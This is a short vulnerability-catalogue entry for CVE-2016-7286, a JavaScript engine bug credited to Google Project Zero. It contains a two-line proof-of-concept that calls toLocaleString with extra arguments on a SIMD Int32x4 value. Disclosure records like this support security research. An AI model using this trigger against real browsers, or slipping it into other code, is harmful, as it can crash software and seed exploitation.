Skip to content

Latest commit

 

History

History
17 lines (12 loc) · 359 Bytes

CVE-2016-7286.md

File metadata and controls

17 lines (12 loc) · 359 Bytes

CVE-2016-7286

  • Report: Dec 2016
  • Fix: Oct 2016
  • Credit: Natalie Silvanovich, Google Project Zero

PoC

var v = SIMD.Int32x4(1, 2, 3, 4);
v.toLocaleString(1, 2, 3, 4)

Reference